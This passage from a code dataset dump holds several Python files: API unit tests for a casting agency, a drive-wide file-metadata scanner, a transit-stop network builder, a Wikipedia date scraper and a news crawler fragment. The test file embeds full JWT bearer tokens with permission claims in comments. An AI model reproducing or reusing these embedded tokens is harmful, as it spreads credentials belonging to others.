eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjNidUcxblJ4VzhDVFNPYkMyanJHZiJ9.eyJpc3MiOiJodHRwczovL2plZmZyZXlmc25kLmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw1ZWUwOTIwNWYyYTc4MzAwMTk2MTEyZTEiLCJhdWQiOiJjYXN0aW5nX2FnZW5jeSIsImlhdCI6MTU5NjExNjU1NCwiZXhwIjoxNTk2MjAyOTUzLCJhenAiOiJ1UXZNNDVPNkZmNGpxWm1GbzhiZ1hCckRKUG5KUDVkayIsInNjb3BlIjoiIiwicGVybWlzc2lvbnMiOlsiZGVsZXRlOmFjdG9ycyIsImdldDphY3RvcnMiLCJnZXQ6bW92aWVzIiwicGF0Y2g6YWN0b3JzIiwicGF0Y2g6bW92aWVzIiwicG9zdDphY3RvcnMiXX0.s5unjMh1FER-73M3rQX0HE-ERkZuTSMfPfOKMnEreHqAGN2kd1miVwXLn2ezlCconYWbpdAmLRHn-J4STkLGer_DWDN9hImpYQ-NUZu-dGr8leHo7IVgK5vOhqUZQZ6bGPq1WEcwUS5m2OvIOQb50b6oyajfMAcmq-LfoB0P6z8zRY15lCBiacAZXidS2Kh40b0VkXMjDwcya7OugLEdtLVtfAda7JKle4_zAvjGFVLLS0qtRO5MRefUVXWUHzGVUbBE_-MCAjKJSur8I-06Zu6n4TI85ulViCpfS65mb-mTlcn7kM-XKxg8Tf7jS5Zfx5efkSRxDv2q_LKiaMc6Kg\"\n# }\n# EXECUTIVE_PRODUCER_AUTH_HEADER = {\n# 'Authorization': \"Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjNidUcxblJ4VzhDVFNPYkMyanJHZiJ9.eyJpc3MiOiJodHRwczovL2plZmZyZXlmc25kLmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw1ZWRiNDJkZTIyOWRjZTAwMTNkNTYzMTYiLCJhdWQiOiJjYXN0aW5nX2FnZW5jeSIsImlhdCI6MTU5NjExNjI1NCwiZXhwIjoxNTk2MjAyNjUzLCJhenAiOiJ1UXZNNDVPNkZmNGpxWm1GbzhiZ1hCckRKUG5KUDVkayIsInNjb3BlIjoiIiwicGVybWlzc2lvbnMiOlsiZGVsZXRlOmFjdG9ycyIsImRlbGV0ZTptb3ZpZXMiLCJnZXQ6YWN0b3JzIiwiZ2V0Om1vdmllcyIsInBhdGNoOmFjdG9ycyIsInBhdGNoOm1vdmllcyIsInBvc3Q6YWN0b3JzIiwicG9zdDptb3ZpZXMiXX0.j9S9QCzIRAxYfPJycXJarYTwnhWCib9apJT5PS8aFotFUmZ8VSS5kh-_zMCwUf86jhpP5_Jg1b6IdkQyYAB9lp8IIBBW-HiHQfNMgR3WF6qE2wHHhvk-lUqY-Squjf_e9vOV1J90XuNwUOFTAjackTpi-CGiJVpeGtSoDpo5gn9QZOsBhHxO3e8QRRGPYIRJ-5mVXIm8yjlihe9CWv1VaEtddmxycIizWSI9lfgU8mTdwXzkeab6_gUhCbFS8j0nu8xUR0OcoHGR_WX2wjPaoeMgL3uhTo5cRhlWCey8PsV-FakDDs9ZPgxfEFv2nKngQNnvKYOvUWHpbib1Lr1EGw\"\n# }\nCASTING_ASSISTANT_AUTH_HEADER = {\n 'Authorization': TOKENS['CASTING_ASSISTANT']\n}\nCASTING_DIRECTOR_AUTH_HEADER = {\n 'Authorization': TOKENS['CASTING_DIRECTOR']\n}\nEXECUTIVE_PRODUCER_AUTH_HEADER = {\n 'Authorization': TOKENS['EXECUTIVE_PRODUCER']\n}\n\n\nclass CastAgencyTestCase(unittest.TestCase):\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"cast_agency_test\"\n # self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n self.database_path = 'postgresql:///cast_agency_test'\n setup_db(self.app, self.database_path)\n drop_and_create_all()\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n \n # Actors\n '''\n Get actors\n '''\n def test_get_actors(self):\n '''\n normal operation of getting actors\n '''\n res = self.client().get('/actors', headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['actors'])\n self.assertTrue(data['total_actors'])\n\n def test_get_actors_not_found(self):\n '''\n no actors in the page\n '''\n res = self.client().get('/actors?page=12000000', headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 404)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_actors_no_authorization(self):\n '''\n no permission provided at all\n '''\n res = self.client().get('/actors')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 401)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Authorization header is expected.')\n\n '''\n create actors\n '''\n def test_create_actor(self):\n '''\n normal operation for posting actor\n '''\n new_actor = {\n 'name': 'Jeffrey',\n 'age': 20,\n 'gender': 'Male'\n }\n res = self.client().post('/actors', json=new_actor, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created'])\n self.assertTrue(data['total_actors'])\n\n def test_create_in_valid_actor(self):\n '''\n no null value in the actor\n '''\n new_actor = {\n 'name': '',\n 'age': 20,\n 'gender': ''\n }\n res = self.client().post('/actors', json=new_actor, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n def test_create_actor_no_permission(self):\n new_actor = {\n 'name': 'Jeffrey',\n 'age': 20,\n 'gender': 'Male'\n }\n res = self.client().post('/actors', json=new_actor, headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n '''\n update actors\n '''\n def test_edit_actor(self):\n '''\n normal operation\n '''\n update_json = {\n 'age': 30\n }\n res = self.client().patch(\"/actors/1\", json=update_json, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['edit_actor'])\n self.assertTrue(data['total_actors'])\n\n def test_edit_actor_not_found(self):\n '''\n no such actor id in the db\n '''\n actor_id = 10000000\n update_json = {\n 'age': 30\n }\n res = self.client().patch(f'/actors/{actor_id}', json=update_json, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 404)\n self.assertEqual(data['message'], 'not found')\n\n def test_edit_actor_no_permission(self):\n update_json = {\n 'age': 30\n }\n res = self.client().patch(\"/actors/1\", json=update_json, headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n\n '''\n Test delete actor\n '''\n def test_delete_actor(self):\n '''\n normal operation for delete\n '''\n res = self.client().delete('/actors/1', headers = CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted'], 1)\n\n def test_delete_actor_no_permission(self):\n '''\n assistant can't delete actor\n '''\n res = self.client().delete('/actors/1', headers = CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n\n def test_delete_actor_unprocessable(self):\n '''\n no such actor id in the db.\n '''\n actor_id = 100000000\n res = self.client().delete(f'/actors/{actor_id}', headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n # Movies\n '''\n Get movies\n '''\n def test_get_movies(self):\n '''\n normal operation\n '''\n res = self.client().get('/movies', headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['movies'])\n self.assertTrue(data['total_movies'])\n\n def test_get_movies_not_found(self):\n '''\n no movies in the page\n '''\n res = self.client().get('/movies?page=123453456', headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 404)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_movies_no_authorization(self):\n '''\n no permission provided at all\n '''\n res = self.client().get('/movies')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 401)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Authorization header is expected.')\n\n '''\n CREATE movies\n '''\n def test_create_movie(self):\n '''\n normal operation\n '''\n new_movie = {\n 'title': 'John Wick 2',\n 'release_date': '2017-2-10'\n }\n res = self.client().post('/movies', json=new_movie, headers=EXECUTIVE_PRODUCER_AUTH_HEADER)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created'])\n self.assertTrue(data['total_movies'])\n\n def test_create_in_valid_movie(self):\n '''\n null value in the movies. Can't process\n '''\n new_movie = {\n 'title': '',\n 'release_date': ''\n }\n res = self.client().post('/movies', json=new_movie, headers=EXECUTIVE_PRODUCER_AUTH_HEADER)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n def test_create_movie_no_permission(self):\n '''\n director has no permission to create movie\n '''\n new_movie = {\n 'title': 'John Wick 2',\n 'release_date': '2017-2-10'\n }\n res = self.client().post('/movies', json=new_movie, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n def test_create_movie_no_authorization(self):\n '''\n no authorizatoin at all.\n '''\n new_movie = {\n 'title': 'John Wick 2',\n 'release_date': '2017-2-10'\n }\n res = self.client().post('/movies', json=new_movie)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 401)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Authorization header is expected.')\n\n '''\n Edit movies\n '''\n def test_edit_movie(self):\n '''\n normal operation\n '''\n update_json = {\n 'title': 'John Wick 100'\n }\n res = self.client().patch(\"/movies/1\",json=update_json, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['edit_movie'])\n self.assertTrue(data['total_movies'])\n\n def test_edit_movie_unprocessable(self):\n '''\n No such movie to update\n '''\n update_json = {\n 'title': 'John Wick 100'\n }\n res = self.client().patch('/movies/1000000', json=update_json, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n def test_edit_movie_no_permission(self):\n '''\n assistant has no right to edit the movie\n '''\n update_json = {\n 'title': 'John Wick 100'\n }\n res = self.client().patch(\"/movies/1\",json=update_json, headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n\n '''\n DElETE movies\n '''\n def test_delete_movie(self):\n '''\n normal operation\n '''\n res = self.client().delete('/movies/1', headers=EXECUTIVE_PRODUCER_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted'], 1)\n\n def test_delete_movie_unprocessable(self):\n '''\n no such movie in the db\n '''\n movie_id = 100000000\n res = self.client().delete(f'/movies/{movie_id}', headers=EXECUTIVE_PRODUCER_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n def test_delete_movie_no_permission(self):\n '''\n director has no right to delete the movie\n '''\n res = self.client().delete('/movies/1', headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n\n","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":15546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"112889480","text":"# coding = utf-8\n\"\"\"\ncreate on : 2019/03/02\nproject name : GetFileInfoAll\nfile name : GetFileInfoAll\n\n\"\"\"\nfrom datetime import datetime as dt\nfrom pathlib import Path\nimport time\n\nfrom tqdm import tqdm\nfrom tinydb import TinyDB\n\nTIME_FORMAT = \"%Y/%m/%d %H:%M:%S\"\n\n\ndef start_db(table_name):\n \"\"\" start up tinyDB\n\n :param table_name: database table name string\n :return: database dict\n \"\"\"\n\n # start db\n db = TinyDB(\"DirFileInfo.json\")\n\n table_name_resolve = create_normalize_path(table_name)\n # select table\n db_table = db.table(table_name_resolve)\n\n result_dict = {\"db\": db_table, \"table_name\": table_name_resolve}\n\n return result_dict\n\n\ndef create_normalize_path(org_path_str, slash=False):\n \"\"\" create normalize path string\n\n :param org_path_str: original path string\n :param slash: slash or back slash boolean\n :return: normalize path string\n \"\"\"\n\n org_path_str_replace = org_path_str.replace(\"\\\\\", \"/\")\n\n if slash:\n return org_path_str_replace\n\n normalize_path = str(Path(org_path_str_replace).resolve())\n\n return normalize_path\n\n\ndef search_dir_files(db_table, this_floor_path_list, level):\n \"\"\" search files in directory\n\n :param db_table: database table class\n :param this_floor_path_list: target directory windows path object\n :param level: dir level int\n :return: next level file and dir list\n \"\"\"\n\n def search_subdir(target_path, dir_list):\n \"\"\" search sub-directory items\n\n :param target_path: check item path windows path object\n :param dir_list: next search dir list\n :return: next dir list, item info dict\n \"\"\"\n\n target_path_str = str(target_path)\n\n error_str = \"\"\n\n try:\n if target_path.is_symlink():\n # ignore symbolic link\n pass\n\n if target_path.is_dir():\n # when dir\n target_path_type = \"dir\"\n\n target_path_stat = target_path.stat()\n last_access = dt.fromtimestamp(target_path_stat.st_atime)\n file_create = dt.fromtimestamp(target_path_stat.st_ctime)\n last_modify = dt.fromtimestamp(target_path_stat.st_mtime)\n\n file_size = 0\n\n dir_list.append(target_path)\n\n else:\n # when file\n target_path_type = \"file\"\n\n target_path_stat = target_path.stat()\n last_access = dt.fromtimestamp(target_path_stat.st_atime)\n file_create = dt.fromtimestamp(target_path_stat.st_ctime)\n last_modify = dt.fromtimestamp(target_path_stat.st_mtime)\n\n file_size = target_path_stat.st_size\n\n except Exception as error:\n replace_path_str = target_path_str.replace(\"\\\\\", \"\\\\\\\\\")\n error_str = str(error).replace(replace_path_str, \"Path strings\")\n\n target_path_type = \"error\"\n\n last_access = dt.fromtimestamp(0.0)\n file_create = dt.fromtimestamp(0.0)\n last_modify = dt.fromtimestamp(0.0)\n\n file_size = 0\n\n target_path_dict = {\"path\": target_path_str.replace(\"\\\\\", \"/\"),\n \"path_type\": target_path_type,\n \"level\": level,\n \"last_access\": last_access.strftime(TIME_FORMAT),\n \"file_create\": file_create.strftime(TIME_FORMAT),\n \"last_modify\": last_modify.strftime(TIME_FORMAT),\n \"size\": file_size}\n\n if error_str:\n target_path_dict[\"error_description\"] = error_str\n\n return dir_list, target_path_dict\n\n next_floor_dir_list = []\n target_path_dict_list = []\n\n for this_floor_path in tqdm(this_floor_path_list):\n\n # search all file and dirs\n path_list = list(this_floor_path.glob(\"*\"))\n\n for path in path_list:\n # search file information\n path_info_tuple = search_subdir(path, next_floor_dir_list)\n\n next_floor_dir_list, target_dict = path_info_tuple\n\n target_path_dict_list.append(target_dict)\n\n db_table.insert_multiple(target_path_dict_list)\n\n return next_floor_dir_list\n\n\ndef search_dir_file_info(search_target):\n \"\"\" search every item on target directory\n\n :param search_target: search start directory string\n :return: message string\n \"\"\"\n\n # initialize database\n db_dict = start_db(search_target)\n db_table = db_dict[\"db\"]\n search_target_normalize = db_dict[\"table_name\"]\n\n db_table.purge()\n\n # initialize search condition\n next_floor_dir_list = [Path(search_target_normalize).resolve()]\n\n total_count = target_count = level = 1\n\n output_str = \"\\nlevel no.{no} / count:{item} / total:{total}\"\n\n while target_count > 0:\n\n time.sleep(1)\n\n print(output_str.format(no=str(level).zfill(2),\n item=str(target_count),\n total=str(total_count)))\n\n time.sleep(1)\n\n next_floor_dir_list = search_dir_files(db_table,\n next_floor_dir_list, level)\n\n target_count = len(next_floor_dir_list)\n\n total_count += target_count\n\n level += 1\n\n return \"program finished\"\n\n\ndef main():\n drive_str = \"C:/\"\n\n print(search_dir_file_info(drive_str))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"GetFileInfoAll.py","file_name":"GetFileInfoAll.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"520487917","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom collections import defaultdict\nfrom .StopBallTree import StopBallTree\nfrom .stop import Stop\n\nglobal MAX_DISTANCE\nMAX_DISTANCE = 500\n\n\nclass Network:\n def __init__(self, filename=\"../Data/MARTA_gtfs/all_stops.csv\"):\n \"\"\"\n Initialize the network object so that all the stops which other routes have stops that are close\n :param df_stops: a pandas df with cols ['stop_id', 'route_short_name', 'stop_lat', 'stop_lon']\n\n :attributes:\n # - stops_routes: dictionary {stop_id: routes}\n # - stops: [Stops]\n - stops_dict: {stop_id: Stop}\n - stops_routes_neighbors {stop_id: {route_id: {neighbor_stop_ids}}\n \"\"\"\n cols = ['stop_id', 'route_short_name', 'stop_lat', 'stop_lon'] \n df_stops = pd.read_csv(filename)[cols].sort_values([\"route_short_name\", \"stop_id\"]).reset_index(drop=True)\n self.df_stops = df_stops\n groups = df_stops.groupby('stop_id')\n self.stops_routes = {stop_id: df_routes.route_short_name.values for stop_id, df_routes in groups}\n # print(stops_routes)\n self.error_check(df_stops)\n self.stops = self.make_stops(df_stops)\n self.id_stops = {s.stop_id: s for s in self.stops}\n\n self.stops_routes_neighbors = self.make_transitions(self.stops)\n print(\"MADE NETWORK\")\n\n\n def error_check(self, df_stops):\n test1 = df_stops.drop_duplicates(subset=[\"stop_id\",\"stop_lat\",\"stop_lat\"])\n test2 = df_stops.drop_duplicates(subset=[\"stop_id\"])\n # test3 = df_stops.drop_duplicates(subset=[\"stop_lat\",\"stop_lat\"])\n if len(test1) != len(test2):\n # print(\"Error, multiple stops with same stop_id, but different lat-longs\")\n print(\"test1\", len(test1))\n print(\"test2\", len(test2))\n # print(\"test3\", len(test3))\n raise ValueError(\"Error, multiple stops with same stop_id, but different lat-longs\")\n # exit()\n\n # @staticmethod\n # def make_stop(stop_id, lat, lon, routes):\n # return Stop(stop_id, lat, lon, routes)\n\n def make_stops(self, df_stops):\n cols = [\"stop_id\", \"stop_lat\", \"stop_lon\"]\n temp = df_stops.drop_duplicates(subset=[\"stop_id\", \"stop_lat\", \"stop_lat\"])\n return temp[cols].apply(lambda x: Stop(x[0], x[1], x[2], self.stops_routes[x[0]]), axis=1).values\n\n def make_transitions(self, stops):\n \"\"\"\n :param stops: set or list of Stop objects \n\n :attributes: \n - ind_stops {ind: Stop}\n - ball_tree: StopBallTree(Stops) - finds neighbors within max distance\n - neighbors: [[stop_ids], [stop_ids], ...] index corresponds with ind_stop\n\n :return: dictionary of transitions for each stop {stop_id : {route_id : {neighbor_stop_ids}}}\n \"\"\"\n # print(stops)\n stops = list(stops)\n ind_stops = {ind: s.stop_id for ind, s in enumerate(stops)}\n ball_tree = StopBallTree(stops)\n neighbors_arr = ball_tree.query_radius(stops, MAX_DISTANCE)\n stops_routes_neighbors = defaultdict(lambda: defaultdict(lambda: set()))\n\n # print(neighbors_arr)\n for stop_ind, neighbors in enumerate(neighbors_arr):\n neighbors_dict = defaultdict(lambda: set()) \n for n_ind in neighbors: # neighbor id\n n_stop_id = ind_stops[n_ind] # neighbor stop id\n for route_id in self.stops_routes[n_stop_id]:\n # changing rail names to 0 for now to represent \"RAIL\"\n if route_id in [\"BLUE\", \"RED\", \"GOLD\", \"GREEN\"]:\n route_id = 0\n neighbors_dict[int(route_id)].add(int(n_stop_id))\n\n stop_id = int(ind_stops[stop_ind])\n stops_routes_neighbors[stop_id] = neighbors_dict\n\n return stops_routes_neighbors\n\n def get_transition(self, stop_id, route_id=None, ret_bool=False):\n stop_id = int(stop_id)\n if route_id is None:\n return self.stops_routes_neighbors[stop_id]\n else:\n route_id = int(route_id) # changing rail names to numbers for now\n stops = self.stops_routes_neighbors[stop_id][route_id]\n if ret_bool:\n return len(stops) > 0 # returns if the set is non-empty i.e. if there exists a valid transfer\n else:\n return stops\n\n\n\ndef main():\n # filename = \"mega_stops.csv\"\n # filename = \"/Users/anthonytrasatti/Desktop/Research/Marta/MARTA_gtfs_01_13_2018/stops.txt\"\n # filename = \"all_stops.csv\"\n # df_stops = pd.read_csv(filename)[cols].sort_values([\"route_short_name\",\"stop_id\"]).reset_index(drop=True)\n network = Network(\"../../Data/MARTA_gtfs/all_stops.csv\")\n\n # print(test1[]\n\n print(network.df_stops.head())\n print(network.df_stops.columns)\n for x in network.get_transition(100004, 68): # print stops on route 68 close to stop 100004\n print(x)\n # print(network.neighbors)\n # print(network.stops_routes_neighbors)\n # stops_neighbors_dict = {int(s.stop_id):route_stop_dict(n) for s,n in list(zip(X,neighbors))[0:5]}\n # print(stops_neighbors_dict)\n\nif __name__ == '__main__':\n main()\n# print(count_values([len(x) for x in neighbors]))\n# test = builder_class(neighbors).build()\n# print(test)\n# test = [test.pop() for i in range(10)]\n","sub_path":"version_1_0/gtfs/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"653870056","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 6 16:35:29 2021\n\n@author: Caven\n\"\"\"\n\n\nclass Solution:\n def findNumbers(self, nums: List[int]) -> int:\n count = 0\n \n for i in nums:\n if len(str(i)) % 2 == 0:\n count +=1\n \n return count","sub_path":"1295. Find Numbers with Even Number of Digits.py","file_name":"1295. Find Numbers with Even Number of Digits.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"654402728","text":"import requests, json\n\nmonths={\"january\":\"1\",\"february\":\"2\",\"march\":\"3\",\"april\":\"4\",\"may\":\"5\",\"june\":\"6\",\"july\":\"7\",\"august\":\"8\",\"september\":\"9\",\"october\":\"10\",\"november\":\"11\",\"december\":\"12\"}\n\ndef parseDate(pageText,dateType):\n global months\n dateString=\"error\"\n dateStart = pageText.find(dateType)+len(dateType) #no b because case-insensitive start\n if(dateStart-len(dateType)==-1):\n return \"error\"\n dateEnd = pageText.index(\"\\n\",dateStart)#will error if no newline\n \n dateText=pageText[dateStart:dateEnd]\n dateStart=dateText.find(\"|\")\n if(dateStart!=-1):#if well-formatted\n dateStart=dateText.find(\"|\",dateStart)\n dateEnd=dateText.find(\"|\",dateStart+1)\n bYear=dateText[dateStart+1:dateEnd]\n if(not bYear[0].isdigit()):\n return \"error\"\n\n dateStart=dateEnd\n dateEnd=dateText.find(\"|\",dateStart+1)\n bMonth=dateText[dateStart+1:dateEnd]\n if(len(bMonth)<2):\n bMonth=\"0\"+bMonth\n\n dateStart=dateEnd+1\n dateEnd=dateStart+2\n bDay=dateText[dateStart:dateEnd]\n if(not bDay[1].isdigit()):#one digit day and no leading 0\n bDay=\"0\"+bDay[0]\n dateString=bYear+\"-\"+bMonth+\"-\"+bDay\n elif(dateText.find(\",\")!=-1):\n dateStart=dateText.find(\"=\")\n dateEnd=dateText.find(\" \",dateText.find(\",\")-3)#finds space between month and day\n try:\n bMonth=months[dateText[dateStart+1:dateEnd].strip().lower()]\n except:\n return \"error\"\n dateStart=dateEnd+1\n dateEnd=dateText.find(\",\")\n bDay=dateText[dateStart:dateEnd]\n dateStart=dateEnd+2\n bYear=dateText[dateStart:dateStart+4]\n else: #maybe its just the year?? will write code to parse later\n bYear=dateText[-4:]\n if(not bYear.isdigit()):\n return \"error\"\n bMonth=\"01\"\n bDay=\"01\"\n if(len(bMonth)<2):\n bMonth=\"0\"+bMonth\n if(len(bDay)<2):\n bDay=\"0\"+bDay\n dateString=bYear+\"-\"+bMonth+\"-\"+bDay\n return dateString\n\ndef scraperFunc(category=\"19th-century_Mexican_politicians\"):\n #------------------\n #START OF MAIN CODE\n #------------------\n myUrl = \"https://en.wikipedia.org/w/api.php\"\n #parameters={\"action\":\"query\",\"list\":\"allpages\",\"apfrom\":\"Mexic\",\"aplimit\":100,\"format\":\"json\"}\n #params2={\"action\":\"query\",\"prop\":\"info\",\"inprop\":\"watchers\"}#what pages to do on\n #pageName=\"Otto_von_Bismarck\"\n #pageName=\"Stephen_F._Austin\"\n #params3={\"action\":\"parse\",\"page\":pageName,\"format\":\"json\"}\n\n #category=\"Critics_of_postmodernism\" #TEST< PLEASEE REMOVE!!!!!!!!!!!!!!\n VIEWDAYS=5\n params4={\"action\":\"query\",\"generator\":\"categorymembers\",\"gcmtitle\":(\"Category:\"+category),\"gcmlimit\":200,\"gcmtype\":\"page\",\"prop\":\"revisions|pageviews|description|info\",\"rvslots\":\"main\",\"rvprop\":\"content\",\"pvipdays\":VIEWDAYS,\"inprop\":\"url\",\"format\":\"json\"}#idk rvslots\n \n myData = requests.get(myUrl, params=params4)\n DATA = myData.json()\n #print(type(DATA)) #should be dictionary\n\n #PAGES = DATA[\"query\"][\"allpages\"] #error if not exists\n\n '''\n #params3\n pageText = DATA[\"parse\"][\"text\"][\"*\"]\n\n #actually parsing the stuff\n dateStart = pageText.index(\"1):#date is for singular events, only check if not birth/death since generic name\n dateString=parseDate(pageText,dateTypes[i])\n else:\n del myJSON[pageTitle]\n continue\n if(dateString!=\"error\"):\n myJSON[pageTitle].append(dateString)\n else:#idk what to do here\n print(\"Error in parsing\",pageTitle)\n badDate+=1\n del myJSON[pageTitle]\n continue\n myJSON[pageTitle].append(\"3000-01-01\")\n try:\n myJSON[pageTitle].append(myPage[\"description\"])\n except:\n #print(\"No short description\")\n myJSON[pageTitle].append(myPage[\"title\"])#just has title as description\n try:\n viewAvg=0\n for viewday in myPage[\"pageviews\"]:\n if(myPage[\"pageviews\"][viewday]==None):\n continue\n viewAvg+=myPage[\"pageviews\"][viewday]\n viewAvg/=VIEWDAYS\n myJSON[pageTitle].append(viewAvg)\n except:\n #print(\"No pageview data\")\n myJSON[pageTitle].append(5)\n myJSON[pageTitle].append(myPage[\"fullurl\"])\n\n myJSON=sorted(myJSON.items(), key=lambda x:x[1][0])#python 3.6+ required\n return myJSON\n\n#with open(\"dateJSON.json\",\"w\") as myFile:\n# json.dump(myJSON,myFile)\n","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":5917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"536764548","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2015年6月12日\n\n抽取频道首页或者每个公司新闻频道中的新闻\n@author: liqing\n'''\n\nimport time,traceback,os\nimport hashlib\nfrom newspaper import Article\nfrom crawl.basecrawl import BaseCrawl,BaseExtract\nfrom config.logsetting import logger\nfrom config.dbcon import get_cxn_db\nfrom boilerpipe.extract import Extractor\nfrom pybloom import BloomFilter\n\nIDEL_TIME = 2\nMAX_TRY_TIMES = 3\nFINANCE_HOME = 'finance_home'\nNEWS_URL_EXTRACTE = 0\n\n\ndef get_compnewsurls(code_names_file,url_prefix,finance_homes=None):\n '''产生上市公司新闻频道的urls\n @param code_names_file: 公司上市代码列表\n @param url_prefix: 拼接上市公司新闻url的前缀\n @param finance_homes: 财经频道首页地址\n '''\n if code_names_file is None or url_prefix is None:\n logger.error(' code_names_file or url_prefix is None')\n return []\n news_chanel_urls = []\n if finance_homes and len(finance_homes) > 0:\n for f_home in finance_homes:\n news_chanel_urls.append((FINANCE_HOME,f_home))\n try:\n path = os.path.realpath(__file__)\n path = os.path.dirname(path)\n lspath = os.path.split(path)\n if lspath[0] and lspath[1]:\n code_names_file = lspath[0] + '/data/' + code_names_file\n \n \n for code_name in open(code_names_file):\n if code_name and len(code_name) > 0:\n cols = code_name.split('\\t')\n if cols and len(cols) > 1:\n news_chanel_urls.append((cols[0],url_prefix + cols[0]))\n except:\n logger.error(\"crawl_page failed ,Error:%s\" % traceback.format_exc()) \n return news_chanel_urls\n\n\n#构造一个布隆过滤器\nbf = 